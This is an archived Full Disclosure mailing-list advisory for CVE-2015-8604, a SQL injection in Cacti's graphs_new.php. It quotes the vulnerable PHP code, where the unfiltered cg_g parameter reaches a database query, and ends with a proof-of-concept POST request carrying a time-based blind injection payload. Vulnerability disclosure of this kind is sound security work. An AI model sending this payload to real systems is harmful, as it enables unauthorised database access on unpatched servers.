[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] [CVE-2015-8604] Cacti SQL injection in graphs_new.php

To: fulldisclosure <fulldisclosure@xxxxxxxxxxxx>
Subject: [FD] [CVE-2015-8604] Cacti SQL injection in graphs_new.php
From: "changzhao.mao@xxxxxxxxxxxxxxxxxxxx" <changzhao.mao@xxxxxxxxxxxxxxxxxxxx>
Date: Fri, 8 Jan 2016 18:29:27 +0800

Application: Cacti 
Vendor URL: http://www.cacti.net 
Bugs: SQL injection 
Author:changzhao.mao(DBAPPSecurity Ltd) 
Version affected: 0.8.8f and prior
================================
Introduction
================================
  Cacti is a complete frontend to RRDTool, it stores all of the necessary 
information to create graphs and populate them with data in a MySQL database. 
The frontend is completely PHP driven. Along with being able to maintain 
Graphs, Data Sources, and Round Robin Archives in a database, cacti handles the 
data gathering. There is also SNMP support for those used to creating traffic 
graphs with MRTG.  SQL  injection vulnerabilities has been discovered.The 
vulnerability allows any users  to execute own sql commands to compromise the 
web-applicaation or database management system.  SQL injection Vulnerability 
has been discovered in Cacti(0.8.8f) and prior , which  can be exploited by any 
user to conduct SQL Injection attacks.A patch has been released 
http://bugs.cacti.net/file_download.php?file_id=1201&type=bug .
================================
[Vulnerability info]
================================

in graphs_new.php , trace parameter cg_g

function form_save() {
    if (isset($_POST["save_component_graph"])) {
        /* summarize the 'create graph from host template/snmp index' stuff 
into an array */
        while (list($var, $val) = each($_POST)) {
            if (preg_match('/^cg_(\d+)$/', $var, $matches)) {
                $selected_graphs["cg"]{$matches[1]}{$matches[1]} = true;
            
            //cg_g is not filtered
            
            }elseif (preg_match('/^cg_g$/', $var)) {
                if ($_POST["cg_g"] > 0) {
                    $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = 
true;
                }
            }elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches)) 
{
                $selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . 
$matches[1]}}{$matches[2]} = true;
            }
        }

        if (isset($selected_graphs)) {
            host_new_graphs($_POST["host_id"], $_POST["host_template_id"], 
$selected_graphs);
            exit;
        }

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }

    if (isset($_POST["save_component_new_graphs"])) {
        host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }
}


function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
    /* we use object buffering on this page to allow redirection to another 
page if no
    fields are actually drawn */
    ob_start();

    include_once("./include/top_header.php");

    print "<form method='post' action='graphs_new.php'>\n";

    $snmp_query_id = 0;
    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {
        while (list($form_id1, $form_array2) = each($form_array)) {
            if ($form_type == "cg") {
                $graph_template_id = $form_id1;
                //sql injection in graph_template_id
                html_start_box("<strong>Create Graph from '" . 
db_fetch_cell("select name from graph_templates where id=$graph_template_id") . 
"'", "100%", "", "3", "center", "");
            }elseif ($form_type == "sg") {
                while (list($form_id2, $form_array3) = each($form_array2)) {
                    /* ================= input validation ================= */
                    input_validate_input_number($snmp_query_id);
                    /* ==================================================== */

                    $snmp_query_id = $form_id1;
                    $snmp_query_graph_id = $form_id2;
                    
                    
================================
[Exploit]
================================
POC:

POST /cacti/graphs_new.php HTTP/1.1
Host: 192.168.217.133
Content-Type: application/x-www-form-urlencoded
Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; 
Cacti=j8chtc1ppq4n7viqkbah6c4tv2
Content-Length: 189
__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select
 sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save   



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Prev by Date: [FD] Security BSides Ljubljana 0x7E0 CFP - March 9, 2016
Next by Date: [FD] OpenCart Security Advisory - XSS Vulnerabiltiy - CVE-2015-4671
Previous by thread: [FD] Security BSides Ljubljana 0x7E0 CFP - March 9, 2016
Next by thread: [FD] OpenCart Security Advisory - XSS Vulnerabiltiy - CVE-2015-4671
Index(es):
- Date
- Thread